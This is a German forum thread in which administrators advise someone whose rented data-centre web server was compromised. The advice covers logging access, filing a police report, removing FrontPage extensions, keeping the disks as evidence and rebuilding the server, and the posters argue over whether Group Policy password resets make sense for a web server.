Ich würde alle Zugriffe protokollieren (Network Monitor:http://blogs.technet.com/netmon/) und Anzeige erstatten. Und ich sage es schon jetzt: trotzdem.
Hatte ich mal zu ISDN-Zeiten. War eine Rechnung über mehrere Tausend irgendwas (weiß nicht mehr ob DM oder schon Euro).
(mk)
Hast du auf diesem Server die Frontpage Server Erweiterungen aktiviert?
Wenn du diese nicht benötigst, entferne diese, denn diese werden gerne als Einfallstor hergenommen.
Wenn du diese nicht benötigst, entferne diese, denn diese werden gerne als Einfallstor hergenommen.
fassen wir mal zusammen.
du hast ein kompromittiertes System,nein was red ich ein kompromittierten Server,das heisst im klartext : Alle Daten Passwörter und was sonst noch so auf den Server liegt gilt ab sofort als veröffentlich.
Das was empfohlen wird an tollen tips kannst du getrost vergessen,weil der Server weder Sicherheit bietet noch würde ein ändern aller passwörter weiterhelfen,alle Backups des Servers sind auch kompromittiert,da nicht zurück zu verfolgen ist,ab wann der angreifer sich auf dem System breitgemacht hat.
Somit hast du die kacke wirklich am dampfen,weil du musst jetzt dich mit deinem Chef auseinandersetzen und dem Mitteilen,das nichts mehr sicher ist,du musst ihm mitteilen,das die Backups nichts mehr wert sind,du musst ihm mitteilen,das der server neuaufgesetzt werden muss und du musst ihm mitteilen das alles verschlüsselten daten nicht mehr sicher sind.
ergo: Strafanzeige gegen unbekannt stelle mit dem protokollen die vorhanden sind.
Festplatten ausbauen und in den tresor legen,als beweissicherung,ebenso wie die Backups.
Server neu aufsetzen,einrichten,etc. ,alle User in der Firma über die Gruppenrichtlienie zwingen,beim nächsten login ein neues Passwort sich abzuholen,die Hauptadmin Passwörter nur zwei oder drei leuten mitteilen.
Alles andere wäre unverantwortlich und stellt nicht sicher das der Server wieder dir gehört.
Viel spass beim Chef und wenn du schon bei dem sitzt ,dann sag ihm wer an der sicherheit spart,muss sich nicht wundern,wenn sowas passiert,sollst mal sehen wie schnell ihr ne neue Hardware FW habt.
du hast ein kompromittiertes System,nein was red ich ein kompromittierten Server,das heisst im klartext : Alle Daten Passwörter und was sonst noch so auf den Server liegt gilt ab sofort als veröffentlich.
Das was empfohlen wird an tollen tips kannst du getrost vergessen,weil der Server weder Sicherheit bietet noch würde ein ändern aller passwörter weiterhelfen,alle Backups des Servers sind auch kompromittiert,da nicht zurück zu verfolgen ist,ab wann der angreifer sich auf dem System breitgemacht hat.
Somit hast du die kacke wirklich am dampfen,weil du musst jetzt dich mit deinem Chef auseinandersetzen und dem Mitteilen,das nichts mehr sicher ist,du musst ihm mitteilen,das die Backups nichts mehr wert sind,du musst ihm mitteilen,das der server neuaufgesetzt werden muss und du musst ihm mitteilen das alles verschlüsselten daten nicht mehr sicher sind.
ergo: Strafanzeige gegen unbekannt stelle mit dem protokollen die vorhanden sind.
Festplatten ausbauen und in den tresor legen,als beweissicherung,ebenso wie die Backups.
Server neu aufsetzen,einrichten,etc. ,alle User in der Firma über die Gruppenrichtlienie zwingen,beim nächsten login ein neues Passwort sich abzuholen,die Hauptadmin Passwörter nur zwei oder drei leuten mitteilen.
Alles andere wäre unverantwortlich und stellt nicht sicher das der Server wieder dir gehört.
Viel spass beim Chef und wenn du schon bei dem sitzt ,dann sag ihm wer an der sicherheit spart,muss sich nicht wundern,wenn sowas passiert,sollst mal sehen wie schnell ihr ne neue Hardware FW habt.
> Server neu aufsetzen,einrichten,etc.
,alle
> User in der Firma über die
> Gruppenrichtlienie zwingen,beim
nächsten
> login ein neues Passwort sich
abzuholen,die
> Hauptadmin Passwörter nur zwei
oder drei
> leuten mitteilen.
>
Du hast schon gelesen das es ein Webserver
ist???? Was sollen da Gruppenrichtlinien???
,alle
> User in der Firma über die
> Gruppenrichtlienie zwingen,beim
nächsten
> login ein neues Passwort sich
abzuholen,die
> Hauptadmin Passwörter nur zwei
oder drei
> leuten mitteilen.
>
Du hast schon gelesen das es ein Webserver
ist???? Was sollen da Gruppenrichtlinien???
über den Webserver hat er sich den zugang verschafft,wer sagt dir,das er nicht schon fröhlich in der Firma rumturnt udn sich von dort auch noch sachen holt und sich hintertürchen eingebaut hat ?
meine meinung ist immer noch,Plattmachen, neu aufziehen ,sicherheit hochfahren bis unter die decke. Chef Geld aus dem rippen leiern für Sicherheit. Dabei unschuldig kucken und hoffen das er keine Kündigungsschreiben in seiner geberlaune verteilt.
Zitat hightopone
"über den Webserver hat er sich den zugang verschafft,wer sagt dir,das er nicht schon fröhlich in der Firma rumturnt udn sich von dort auch noch sachen holt und sich hintertürchen eingebaut hat ?"
Zitatende
Zitat Matt HH
"der Server steht in einem RZ (angemietete Schränke) und gehört uns"
zitatende
Daraus würde ich mal schliessen das es kein Server ist der in der Firma steht.
Die nutzen irgendeine Schwachstelle einer Anwendung aus.
"über den Webserver hat er sich den zugang verschafft,wer sagt dir,das er nicht schon fröhlich in der Firma rumturnt udn sich von dort auch noch sachen holt und sich hintertürchen eingebaut hat ?"
Zitatende
Zitat Matt HH
"der Server steht in einem RZ (angemietete Schränke) und gehört uns"
zitatende
Daraus würde ich mal schliessen das es kein Server ist der in der Firma steht.
Die nutzen irgendeine Schwachstelle einer Anwendung aus.